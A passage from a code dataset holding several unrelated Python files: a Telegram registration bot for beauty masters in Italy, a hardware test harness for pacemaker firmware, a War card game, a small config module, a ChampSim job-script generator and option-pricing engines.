context.user_data['subscription_exp'] = '01.09.2023'\n context.user_data['current_page'] = 1\n context.user_data['selected_specializations'] = set()\n context.user_data['provinces'] = set()\n context.user_data['cities'] = ''\n context.user_data['is_house_call'] = False\n context.user_data['is_online'] = False\n context.user_data['is_find_job'] = False\n \n sqlite_helpers.set_user(user.id, user.username)\n logger.info(f'User @{user.username} started the conversation.')\n logger.debug(f'user.id: {user.id}')\n logger.debug(f'user.username: {user.username}')\n logger.debug(f'user.first_name: {user.first_name}')\n logger.debug(f'user.last_name: {user.last_name}')\n\n logger.debug(sqlite_helpers.get_master(user.id))\n\n if sqlite_helpers.get_master(user.id):\n update.message.reply_text(\n text='Мастер уже есть в базе данных',\n reply_markup=keyboards.get_show_master_page_keyboard()\n )\n # return 'SHOW_MASTER_PAGE'\n return 'PHONE_WAITING'\n else:\n sqlite_helpers.set_masters_telegram_id(user.id)\n welcome_message = f'''\\\n Здравствуйте, {user.first_name}.\n Это бот по управлению аккаунтом в базе русскоязычных бьюти-мастеров в Италии @krasotatut_italy_bot.\n Нажимая \"Продолжить\", Вы соглашаетесь с условиями использования.\n '''\n update.message.reply_text(\n text=textwrap.dedent(welcome_message),\n reply_markup=keyboards.get_edit_master_info_keyboard(),\n )\n return 'MASTER_REGISTRATION'\n\n\ndef master_registration_handler(update, context):\n query = update.callback_query\n query.message.reply_text(\n text=textwrap.dedent(messages.start_registration_text),\n )\n query.message.reply_text(\n text=textwrap.dedent(messages.save_master_name_text),\n )\n return 'MASTER_NAME_WAITING'\n\n\ndef save_master_name(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_fullname(\n context.user_data['fullname'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_two_text)\n 
return 'TG_USERNAME_WAITING'\n else:\n send_message(update, context, messages.save_master_name_text)\n else:\n user_reply = update.message.text\n context.user_data['fullname'] = user_reply\n send_confirmation_message(update, context)\n return 'MASTER_NAME_WAITING'\n\n\ndef save_tg_username(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_telegram_username(\n context.user_data['telegram_username'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_three_text)\n return 'EMAIL_WAITING'\n else:\n send_message(update, context, messages.step_two_text)\n else:\n context.user_data['telegram_username'] = update.message.text\n send_confirmation_message(update, context)\n return 'TG_USERNAME_WAITING'\n\n\ndef save_email(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_e_mail(\n context.user_data['e_mail'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_four_text)\n return 'PHONE_WAITING'\n else:\n send_message(update, context, messages.step_three_text)\n else:\n context.user_data['e_mail'] = update.message.text\n send_confirmation_message(update, context)\n return 'EMAIL_WAITING'\n\n\ndef save_phone(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_phone_number(\n context.user_data['phone_number'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_five_text)\n return 'SOCIAL_WAITING'\n else:\n send_message(update, context, messages.step_four_text)\n else:\n try:\n phone_number = phonenumbers.parse(update.message.text)\n if phonenumbers.is_possible_number(phone_number):\n logger.debug(f'+{phone_number.country_code}{phone_number.national_number} phone possible')\n phone_number = f'+{phone_number.country_code}{phone_number.national_number}'\n context.user_data['phone_number'] = phone_number\n send_confirmation_message(update, context)\n else:\n logger.debug('wrong phone')\n send_message(update, context, messages.invalid_phone_text)\n except phonenumbers.NumberParseException as e:\n logger.error(e)\n logger.debug('wrong phone')\n send_message(update, context, messages.invalid_phone_text)\n \n return 'PHONE_WAITING'\n\n\ndef save_social(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_social(\n context.user_data['social'],\n context.user_data['telegram_id'],\n )\n select_categories(update, context)\n return 'SELECT_CATEGORIES'\n else:\n send_message(update, context, messages.step_five_text)\n else:\n context.user_data['social'] = update.message.text\n send_confirmation_message(update, context)\n return 'SOCIAL_WAITING'\n\n\ndef select_categories(update, context):\n query = update.callback_query\n \n if 'SELECT_IS_ONLINE' in query.data:\n sqlite_helpers.update_masters_specializations(\n context.user_data['selected_specializations'],\n context.user_data['telegram_id'],\n )\n select_is_online(update, context)\n return 'SELECT_IS_ONLINE'\n \n elif 'SELECTED_CATEGORY' in query.data:\n pattern, category_id = query.data.split('|')\n category_id = int(category_id)\n context.user_data['category_id'] = category_id\n context.user_data['current_page'] = 1\n select_specializations(update, context)\n return 'SELECT_SPECIALIZATIONS'\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n 
current_page = int(current_page)\n context.user_data['current_page'] = current_page\n \n categories_keyboard = keyboards.get_categories_keyboard(\n sqlite_helpers.get_categories(),\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_six_text,\n categories_keyboard,\n )\n return 'SELECT_CATEGORIES'\n\n\ndef select_specializations(update, context):\n query = update.callback_query\n pprint(context.user_data)\n logger.debug(f'query.data: {query.data}')\n\n if 'SELECT_CATEGORIES' in query.data:\n context.user_data['current_page'] = 1\n select_categories(update, context)\n return 'SELECT_CATEGORIES'\n\n elif 'SELECTED_SPECIALIZATION' in query.data:\n pattern, specialization_id = query.data.split('|')\n specialization_id = int(specialization_id)\n if specialization_id in context.user_data['selected_specializations']:\n context.user_data['selected_specializations'].discard(specialization_id)\n else:\n context.user_data['selected_specializations'].add(specialization_id)\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n\n category_id = context.user_data['category_id']\n specializations_keyboard = keyboards.get_specializations_keyboard(\n sqlite_helpers.get_category_specializations(category_id), \n context.user_data['selected_specializations'], \n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_seven_text,\n specializations_keyboard,\n )\n return 'SELECT_SPECIALIZATIONS'\n\n\ndef select_is_online(update, context):\n query = update.callback_query\n if 'SELECT_REGION' in query.data:\n sqlite_helpers.update_master_is_online(\n context.user_data['is_online'],\n context.user_data['telegram_id'],\n ) \n select_region(update, context)\n return 'SELECT_REGION'\n elif 'PUSH_IS_ONLINE' in query.data:\n if not context.user_data['is_online']:\n context.user_data['is_online'] = True\n else:\n context.user_data['is_online'] = False\n is_online_keyboard = keyboards.get_is_online_keyboard(\n context.user_data['is_online'],\n )\n send_message(\n update, \n context, \n messages.select_is_online_text,\n is_online_keyboard,\n )\n return 'SELECT_IS_ONLINE'\n\n\ndef select_region(update, context):\n query = update.callback_query\n \n if 'CITIES_WAITING' in query.data:\n sqlite_helpers.update_masters_provinces(\n context.user_data['provinces'],\n context.user_data['telegram_id'],\n )\n save_cities(update, context)\n return 'CITIES_WAITING'\n\n elif 'SELECTED_REGION' in query.data:\n pattern, region_id = query.data.split('|')\n region_id = int(region_id)\n context.user_data['region_id'] = region_id\n context.user_data['current_page'] = 1\n select_provinces(update, context)\n return 'SELECT_PROVINCES'\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n \n regions_keyboard = keyboards.get_regions_keyboard(\n sqlite_helpers.get_regions(),\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_eight_text,\n regions_keyboard,\n )\n return 'SELECT_REGION'\n\n\ndef select_provinces(update, context):\n query = update.callback_query\n region_id = context.user_data['region_id']\n region_provinces = sqlite_helpers.get_provinces(region_id)\n\n if 'SELECT_REGION' in query.data:\n context.user_data['current_page'] = 1\n select_region(update, context)\n return 'SELECT_REGION'\n\n elif 'SELECTED_PROVINCE' in query.data:\n pattern, province_id 
= query.data.split('|')\n province_id = int(province_id)\n if province_id in context.user_data['provinces']:\n context.user_data['provinces'].discard(province_id)\n else:\n context.user_data['provinces'].add(province_id)\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n\n provinces_keyboard = keyboards.get_provinces_keyboard(\n region_provinces,\n context.user_data['provinces'],\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_nine_text,\n provinces_keyboard,\n )\n return 'SELECT_PROVINCES'\n\n\ndef save_cities(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_cities(\n context.user_data['cities'],\n context.user_data['telegram_id'],\n )\n select_is_house_call(update, context)\n return 'SELECT_IS_HOUSE_CALL'\n else:\n send_message(update, context, messages.add_cities_text)\n else:\n context.user_data['cities'] = update.message.text\n send_confirmation_message(update, context)\n return 'CITIES_WAITING'\n\n\ndef select_is_house_call(update, context):\n query = update.callback_query\n\n if 'PUSH_IS_HOUSE_CALL' in query.data:\n if not context.user_data['is_house_call']:\n context.user_data['is_house_call'] = True\n else:\n context.user_data['is_house_call'] = False\n elif 'SELECT_IS_FIND_JOB' in query.data:\n sqlite_helpers.update_master_is_house_call(\n context.user_data['is_house_call'],\n context.user_data['telegram_id'],\n )\n context.user_data['current_page'] = 1\n select_find_job(update, context)\n return 'SELECT_IS_FIND_JOB'\n \n house_call_keyboard = keyboards.get_house_call_keyboard(\n context.user_data['is_house_call'],\n context.user_data['is_online'],\n )\n send_message(\n update, \n context, \n messages.step_ten_text,\n house_call_keyboard,\n )\n return 'SELECT_IS_HOUSE_CALL'\n\n\ndef select_find_job(update, context):\n query = update.callback_query\n if 'PUSH_IS_FIND_JOB' in query.data:\n if not context.user_data['is_find_job']:\n context.user_data['is_find_job'] = True\n else:\n context.user_data['is_find_job'] = False\n\n elif 'OTHER_INFO' in query.data:\n sqlite_helpers.update_master_is_find_job(\n context.user_data['is_find_job'],\n context.user_data['telegram_id'],\n )\n context.user_data['current_page'] = 1\n other_info(update, context)\n return 'OTHER_INFO'\n\n find_job_keyboard = keyboards.get_find_job_keyboard(\n context.user_data['is_find_job']\n )\n send_message(\n update, \n context, \n messages.step_eleven_text,\n find_job_keyboard,\n )\n return 'SELECT_IS_FIND_JOB'\n\n\ndef other_info(update, context):\n pprint(context.user_data)\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_other_info(\n context.user_data['other_info'],\n context.user_data['telegram_id'],\n )\n show_master_page(update, context)\n return 'SHOW_MASTER_PAGE'\n else:\n send_message(update, context, messages.step_twelve_text,\n keyboards.get_other_info_keyboard())\n else:\n context.user_data['other_info'] = update.message.text\n send_confirmation_message(update, context)\n return 'OTHER_INFO'\n\n\ndef show_master_page(update, context):\n master = sqlite_helpers.get_master(context.user_data['telegram_id'])\n master_specializations = sqlite_helpers.get_master_specializations_names(\n context.user_data['telegram_id'])\n master_provinces = sqlite_helpers.get_master_provinces_names(\n context.user_data['telegram_id']) \n message_text = 
messages.get_master_page_text(\n master, \n master_specializations,\n master_provinces,\n )\n keyboard = keyboards.get_master_page_keyboard()\n send_message(update, context, message_text, keyboard)\n\n return 'SHOW_MASTER_PAGE'\n\n\n\ndef main():\n formatter = logging.Formatter(\n fmt='%(asctime)s %(name)s:%(lineno)d - %(message)s',\n datefmt='%Y-%b-%d %H:%M:%S (%Z)',\n style='%',\n )\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n console_handler.setLevel(logging.DEBUG)\n\n file_handler = logging.FileHandler(f'{__file__}.log')\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.INFO)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n logger.setLevel(logging.DEBUG)\n\n keyboards_logger = logging.getLogger('keyboards')\n keyboards_logger.addHandler(console_handler)\n keyboards_logger.setLevel(logging.DEBUG)\n\n keyboards_logger = logging.getLogger('messages')\n keyboards_logger.addHandler(console_handler)\n keyboards_logger.setLevel(logging.DEBUG)\n\n sqlite_helpers_logger = logging.getLogger('sqlite_helpers')\n sqlite_helpers_logger.addHandler(console_handler)\n sqlite_helpers_logger.setLevel(logging.DEBUG)\n\n\n load_dotenv()\n updater = Updater(\n token=os.getenv('TELEGRAM_TOKEN'),\n use_context=True,\n )\n dispatcher = updater.dispatcher\n dispatcher.add_handler(CommandHandler('start', handle_users_reply))\n dispatcher.add_handler(CallbackQueryHandler(handle_users_reply))\n dispatcher.add_handler(MessageHandler(Filters.text, handle_users_reply))\n dispatcher.add_error_handler(error_handler)\n\n updater.start_polling()\n updater.idle()\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ArkJzzz/krasotatut","sub_path":"masters_bot.py","file_name":"masters_bot.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6032558157","text":"import threading\nimport serial\nimport queue\nimport tests\nfrom time import sleep\nfrom heartview import detectPeaks\nimport timeit\nimport statistics\nfrom serial.tools.list_ports import comports\nimport k64f\nimport nucleo\n\n# FRDM_HWID = \"0D28:0204\" # mbed\nFRDM_HWID = \"1366:1015\" # JLink\nNUCLEO_HWID = \"0483:374B\" # ST-Link\n\nclass FrdmSerialThread(threading.Thread):\n def __init__(self, serialPort, inQueue, outQueue):\n super().__init__(target=None)\n self.serialPort = serialPort\n self.inQueue = inQueue\n self.outQueue = outQueue\n self._running = True\n\n def run(self):\n with serial.Serial(self.serialPort, baudrate=115200, timeout=2) as frdmSerial:\n while self._running:\n try:\n txData = self.outQueue.get(block=False)\n frdmSerial.write(txData)\n except queue.Empty:\n pass\n rxData = frdmSerial.readline()\n if (not rxData or b'\\x00' in rxData):\n continue\n self.inQueue.put(rxData)\n def stop(self):\n self._running = False\n\nclass NucleoSerialThread(threading.Thread):\n def __init__(self, serialPort, inQueue, outQueue):\n super().__init__(target=None)\n self.serialPort = serialPort\n self.inQueue = inQueue\n self.outQueue = outQueue\n self._running = True\n\n def run(self):\n\n with serial.Serial(self.serialPort, baudrate=115200, timeout=5) as nucleoSerial:\n nucleoSerial.write(b\"\\x00\\x00\\x00\\x00\")\n while self._running:\n try:\n txData = self.outQueue.get(block=False)\n nucleoSerial.write(txData)\n except queue.Empty:\n pass\n while nucleoSerial.read() != b\"\\xff\":\n pass\n rxData = nucleoSerial.read(4)\n if not rxData:\n continue\n 
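                # a complete 4-byte frame followed the 0xff sync byte; pass it to the consumer queue\n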
self.inQueue.put(rxData)\n def stop(self):\n self._running = False\n\nclass PeakDetectorThread(threading.Thread):\n def __init__(self, dataQueue, threshQueue, atrEvent, ventEvent):\n super().__init__(target=None)\n self.atrEvent = atrEvent\n self.ventEvent = ventEvent\n self.threshQueue = threshQueue\n self.dataQueue = dataQueue\n self.threshold = 5\n self._running = True\n\n def run(self):\n while (self._running):\n try:\n self.threshold = self.threshQueue.get_nowait()\n except queue.Empty:\n pass\n # Recieve data from nucleo\n data = self.dataQueue.get()\n peaks = detectPeaks(data, self.threshold)\n\n if self.atrEvent.isSet():\n if not peaks[0]:\n self.atrEvent.clear()\n else:\n continue\n elif self.ventEvent.isSet():\n if not peaks[1]:\n self.ventEvent.clear()\n else:\n continue\n if peaks[0]:\n self.atrEvent.set()\n if peaks[1]:\n self.ventEvent.set()\n \n def stop(self):\n self._running = False\n\ndef findPorts():\n frdmFound = False\n nucleoFound = False\n nucleoPort = \"\"\n frdmPort = \"\"\n while (True):\n for port in comports():\n if FRDM_HWID in port.hwid:\n frdmFound = True\n frdmPort = port.device\n elif NUCLEO_HWID in port.hwid:\n nucleoFound = True\n nucleoPort = port.device\n if (frdmFound and nucleoFound):\n return [nucleoPort, frdmPort]\n\n\ndef main():\n frdmRxQueue = queue.Queue()\n frdmTxQueue = queue.Queue()\n nucleoRxQueue = queue.Queue()\n nucleoTxQueue = queue.Queue()\n threshQueue = queue.Queue()\n atrEvent = threading.Event()\n ventEvent = threading.Event()\n ports = findPorts()\n frdmSerialThread = FrdmSerialThread(ports[1], frdmRxQueue, frdmTxQueue)\n frdmSerialThread.start()\n nucleoSerialThread = NucleoSerialThread(\n ports[0], nucleoRxQueue, nucleoTxQueue\n )\n nucleo.flash(\"binaries/nucleo.bin\")\n nucleoSerialThread.start()\n peakThread = PeakDetectorThread(nucleoRxQueue, threshQueue, atrEvent, ventEvent)\n peakThread.start()\n k64f.flash(\"binaries/pacing.bin\")\n sleep(1)\n AT1_result = tests.AT1(frdmRxQueue, frdmTxQueue).run()\n print(10*\"=\")\n print(f\"Whoami K64F Test: {AT1_result}\")\n print(10*\"=\")\n AT3_result = tests.AT3(nucleoRxQueue, frdmTxQueue, threshQueue, atrEvent, ventEvent).run()\n print(f\"Pacing Test (ATR, 5V, 10ms): {AT3_result[0]}\")\n print(f\"Pacing Test (VENT, 5V, 10ms): {AT3_result[1]}\")\n print(f\"Pacing Test (ATR, 3V, 5ms): {AT3_result[2]}\")\n print(f\"Pacing Test (VENT, 3V, 5ms): {AT3_result[3]}\")\n print(10*\"=\")\n k64f.flash(\"binaries/sensing.bin\")\n sleep(1)\n AT4_result = tests.AT4(frdmRxQueue, frdmTxQueue, nucleoTxQueue).run()\n print(f\"Sensing Test (ATR, 10ms, 120bpm): {AT4_result[0]}\")\n print(f\"Sensing Test (VENT, 10ms, 120bpm): {AT4_result[1]}\")\n print(10*\"=\")\n frdmSerialThread.stop()\n nucleoSerialThread.stop()\n peakThread.stop()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theguymeyer/heartview","sub_path":"course_dev/testing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"20686279352","text":"# War\n# 2 players - highest card wins\n\nimport Cards, Games\n\nclass War_Card(Cards.Card):\n \"\"\" A War Card. \"\"\"\n\n @property\n def value(self):\n\n if self.is_face_up:\n v = War_Card.RANKS.index(self.rank) + 1\n else:\n v = None\n return v\n\nclass War_Deck(Cards.Deck):\n \"\"\" A War Deck. 
\"\"\"\n def populate(self):\n for suit in War_Card.SUITS:\n for rank in War_Card.RANKS:\n self.cards.append(War_Card(rank, suit))\n\nclass War_Hand(Cards.Hand):\n \"\"\" A War Hand. \"\"\"\n def __init__(self,name,money = 0):\n super(War_Hand, self).__init__()\n self.name = name\n self.money = money\n\n def __str__(self):\n rep = self.name + \":\\t\" + super(War_Hand, self).__str__()\n if self.total:\n rep += \"(\" + str(self.total) + \")\"\n rep += \"$\" + str(self.money)\n return rep\n\n @property\n def total(self):\n # if a card in the hand has value of None, then total is None\n for card in self.cards:\n if not card.value:\n return None\n\n # add up card values, treat each Ace as 1\n t = 0\n for card in self.cards:\n t += card.value\n\n return t\n\n def is_busted(self):\n return self.total > 21\n\nclass War_Player(War_Hand):\n \"\"\"A War Player.\"\"\"\n\n def win(self):\n print(self.name, \"wins.\")\n self.money += 1\n\nclass War_Game(object):\n \"\"\" A Game of War. \"\"\"\n def __init__(self, names):\n self.players = []\n for name in names:\n player = War_Player(name)\n self.players.append(player)\n\n self.deck = War_Deck()\n self.deck.populate()\n self.deck.shuffle()\n\n def play(self):\n\n # deal initial card to both players\n if len(self.deck.cards) < 3:\n self.deck.clear()\n self.deck.populate()\n self.deck.shuffle()\n print(\"\\nReshuffling...\\n\")\n else:\n self.deck.deal(self.players, per_hand = 1)\n for player in self.players:\n print(player)\n if self.players[0].total > self.players[1].total:\n self.players[0].win()\n elif self.players[0].total < self.players[1].total:\n self.players[1].win()\n else:\n print(\"It's a tie!\")\n # remove everyone's cards\n for player in self.players:\n player.clear()\n\ndef main():\n print(\"\\t\\tWelcome to War!\\n\")\n\n names = []\n\n for i in range(2):\n name = None\n while not name:\n name = input(\"Enter player \"+str(i+1)+ \"'s name: \")\n names.append(name)\n\n print()\n\n game = War_Game(names)\n\n again = None\n while again != \"n\" and game.players:\n game.play()\n again = Games.ask_yes_no(\"\\nDo you want to play again? 
(Y/N): \")\n\nmain()\ninput(\"\\n\\nPress the enter key to exit.\")\n \n","repo_name":"ZebGirouard/zeb-hobby-bucket","sub_path":"Python/pycode/War.py","file_name":"War.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74668171112","text":"\nimport logging,json\n\nfrom parser.f_yaml import Parser\nfrom storage.mongo import MongoStore\nfrom protocol.http import HttpClass\nfrom template_engine.f_jinja2 import Jinja2Engine\n\nlogger = logging.getLogger('fource_logger')\n\nhdlr = logging.FileHandler('/var/tmp/fource.log')\n\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\nhdlr.setFormatter(formatter)\n\nlogger.addHandler(hdlr) \n\nlogger.setLevel(logging.INFO)\n\n\n#Type of Parser\nPARSER_SELECT = {\n 'yml': Parser\n}\n\n#Type of storage for results\nSTORAGE_SELECT = {\n 'mongo': MongoStore\n}\n\n#Protocol followed\nPROTOCOL_SELECT = {\n 'http': HttpClass\n}\n\n\n#Templating engine for house keeping\nTEMPLATE_ENGINE = {\n 'jinja2': Jinja2Engine\n}\n\n\n\n\n","repo_name":"fource/fource","sub_path":"lib/fource/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"3382652604","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os, sys, time, datetime\nimport re, ast\n\nfrom champsim_run_commons import *\n\nscript_header = \"\"\"#!/bin/bash\n#SBATCH -A p2017001\n#SBATCH --time 16:00:0\n#SBATCH --requeue\"\"\"\n\"\"\"#SBATCH --error=/dev/nul\"\"\"\n\"\"\"#SBATCH --output=/dev/nul\"\"\"\n\nif not results_dir in os.listdir(\"/\"):\n\tos.makedirs(results_dir, exist_ok=True)\n\ntry:\n\tfor f in os.listdir(temp_script_dir):\n\t\tos.remove(os.path.join(temp_script_dir, f))\nexcept OSError:\n\tpass\nos.makedirs(temp_script_dir, exist_ok=True)\n\n# try:\n# \tfor f in os.listdir(individual_results_dir):\n# \t\tos.remove(os.path.join(individual_results_dir, f))\n# except OSError:\n# \tpass\nos.makedirs(individual_results_dir, exist_ok=True)\n\nscript_count = 0\n\nprint_index = 0\nscript_limit = 6900\n\nfor t in tests_to_run:\n\tfor i in configurations:\n\t\tfor merged_files in test_files[tests.index(t)]:\n\t\t\tif str(i[0]) not in replacement_algorithms:\n\t\t\t\tprint(\"ERROR: unknown replacment algorithm \" + str(i[0]))\n\t\t\t\texit(1)\n\n\t\t\tif ((print_index * script_limit) <= script_count <= ((print_index + 1) * script_limit)):\n\t\t\t\tcurrent_script = open(temp_script_dir + \"/script\" + str(script_count) + \".sh\", \"w\")\n\n\t\t\t\tcurrent_script.write(script_header)\n\n\t\t\t\tcurrent_script.write(\"\\n\\n\")\n\n\t\t\t\tcurrent_script.write(executables[replacement_algorithms.index(str(i[0]))][conf] + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-warmup_instructions\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(warmup_inst) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-simulation_instructions\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(sim_inst) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-queue_length\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(i[3]) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-queue_cycles\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(i[4]) + \" \" + \n\t\t\t\t\t\t\t\t\t\t(\"-implement_queue\" if i[1] == 1 else \"\") + \" \" + \n\t\t\t\t\t\t\t\t\t\t(\"-serial_queue\" if i[2] == 1 else \"\") + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-traces\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tmerged_files[0] + \" \" + \n\t\t\t\t\t\t\t\t\t\t\" > \" + individual_results_dir + \"/\" + 
\n\t\t\t\t\t\t\t\t\t\t(merged_files[0].replace(\"/\", \"\").replace(\".\", \"\") + \"-\" + str(i[0]) + \"-\" + str(i[1]) + \"-\" + str(i[2]) + \"-\" + str(i[3]) + \"-\" + str(i[4])) + \n\t\t\t\t\t\t\t\t\t\t\"-result.txt\" + \n\t\t\t\t\t\t\t\t\t\t\"\\n\")\n\n\t\t\t\tcurrent_script.close()\n\n\t\t\tscript_count += 1\n","repo_name":"Ahmed-Nematallah/ChampSimQueue","sub_path":"print_commands.py","file_name":"print_commands.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69958375272","text":"import abc\nimport numpy as np\nimport scipy.stats as sp\nfrom scipy.special import comb\nfrom market_data import MarketData\nfrom mathematics import round_up_to_odd\n\nclass PricingEngine(object):\n\t__metaclass__=abc.ABCMeta\n\tdef calculate(self):\n\t\tpass\n\nclass BinomialPricingEngine(PricingEngine):\n\tdef __init__(self, steps, pricer, greeks):\n\t#def __init__(self, steps, pricer, greeks):\n\t\tself.__steps = steps\n\t\tself.pricer = pricer\n\t\tself.__greeks = greeks\n\n\t@property\n\tdef steps(self):\n\t\treturn self.__steps\n\n\t@steps.setter\n\tdef steps(self, new_steps):\n\t\tself.__steps = new_steps\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\tdef getGreeks(self, option, data, pricer):\n\t\treturn self.__greeks(self, option, data, pricer)\n\ndef BinomialPricer(engine, option, data):\n\t(spot, rate, volatility, dividend, expiry, strike) = data.get_data()\n\tn = engine.steps\n\t#n = round_up_to_odd(n)\n\tdt = expiry / n\n\t#u = np.exp(volatility * np.sqrt(dt))\n\t#d = 1.0 / u\n\t#p = (np.exp((rate-dividend)*dt)-d) / (u-d)\n\tu = np.exp((rate-dividend-0.5*volatility*volatility)*dt+volatility*np.sqrt(dt))\n\td = np.exp((rate-dividend-0.5*volatility*volatility)*dt-volatility*np.sqrt(dt))\n\t#Df = np.exp(-rate*expiry)\n\tdrift = np.exp(rate*dt)\n\tq = (drift-d)/(u-d)\n\t\n\tstkval = np.zeros((n+1,n+1))\n\toptval = np.zeros((n+1,n+1))\n\tstkval[0,0] = spot\n\tfor i in range(1,n+1):\n\t\tstkval[i,0] = stkval[i-1,0]*u\n\t\tfor j in range(1, i+1):\n\t\t\tstkval[i,j] = stkval[i-1,j-1]*d\n\n\tfor j in range(n+1):\n\t\toptval[n,j] = option.payoff(stkval[n,j], strike)\n\t\n\tfor i in range(n-1,-1,-1):\n\t\tfor j in range(i+1):\n\t\t\toptval[i,j] = (q*optval[i+1,j]+(1.0-q)*optval[i+1,j+1])/drift\n\n\tprice = optval[0,0]\n\t# delta = (optval[1,1]-optval[1,0])/(spot*u-spot*d)\n\t# topleft = (optval[2,2]-optval[2,1])/(spot*u*u-spot)\n\t# topright = (optval[2,1]-optval[2,0])/(spot-spot*d*d)\n\t# bottom = 0.5*(spot*u*u-spot*d*d)\n\t# gamma = (topleft-topright)/bottom\n\t# theta = (optval[2,1]-optval[0,0])/(2.0*dt*365)\n\n\treturn price\n\n\t# sum_ = 0.0\n\n\t# for j in range(n):\n\t# \tSi = spot * u**j * d**(n-j)\n\t# \tsum_ += comb(n,j)* p**j * (1-p)**(n-j)*option.payoff(Si, strike)\n\n\t# price = Df*sum_\n\n\t# return price\n\nclass BlackScholesPricingEngine(PricingEngine):\n\tdef __init__(self, optType, pricer, greeks):\n\t\tself.__optType = optType\n\t\tself.pricer = pricer\n\t\tself.__greeks = greeks\n\n\t@property\n\tdef optType(self):\n\t\treturn self.__optType\n\n\t@optType.setter\n\tdef optType(self, new_optType):\n\t\tself.__optType = new_optType\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\tdef getGreeks(self, option, data, pricer):\n\t\treturn self.__greeks(self, option, data, pricer)\n\ndef BlackScholesPricer(engine, option, data):\n\t(spot, rate, volatility, q, expiry, strike) = data.get_data()\n\topt_type = 
engine.optType\n\tdiscount_rate = np.exp(-rate * expiry)\n\tdqr = np.exp(-q*expiry)\n\t\n\td1 = (1.0/(volatility*np.sqrt(expiry)))*(np.log(spot/strike)+\n\t\t((rate-q)+volatility*volatility*0.5)*expiry)\n\td2 = d1 - volatility*np.sqrt(expiry)\n\n\tdef N(x):\n\t\treturn sp.norm.cdf(x)\n\n\tif (opt_type == \"call\") or (opt_type == \"Call\"):\n\t\tprice = N(d1)*spot*dqr-N(d2)*strike*discount_rate\n\telif (opt_type == \"put\") or (opt_type == \"Put\"):\n\t\tprice = N(-d2)*strike*discount_rate-N(-d1)*spot*dqr\n\n\treturn price\n\n\nclass MonteCarloPricingEngine(PricingEngine):\n\tdef __init__(self, replications, time_steps, pricer):\n\t\tself.__replications = replications\n\t\tself.__time_steps = time_steps\n\t\tself.pricer = pricer\n\t\t#self.__greeks = greeks\n\n\t@property\n\tdef replications(self):\n\t\treturn self.__replications\n\n\t@replications.setter\n\tdef replications(self, new_replications):\n\t\tself.__replications = new_replications\n\n\t@property\n\tdef time_steps(self):\n\t\treturn self.__time_steps\n\n\t@time_steps.setter\n\tdef time_steps(self, new_time_steps):\n\t\tself.__time_steps = new_time_steps\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\t# def getGreeks(self, option, data, pricer):\n\t# \treturn self.__greeks(self, option, data, pricer)\n\ndef Naive_Monte_Carlo_Pricer(engine, option, data):\n\t(S, r, V, q, T, strike) = data.get_data()\n\ttime_steps = engine.time_steps\n\treplications = engine.replications\n\tdiscount_rate = np.exp(-r * T)\n\tdelta_t = T / time_steps\n\tz = np.random.normal(size = time_steps)\n\n\tnudt = ((r-q)-0.5*V*V)*T\n\tsidt = V*np.sqrt(T)\n\n\tS_t = np.zeros((replications, ))\n\tpayoff_t = 0.0\n\tfor i in range(replications):\n\t\tS_t 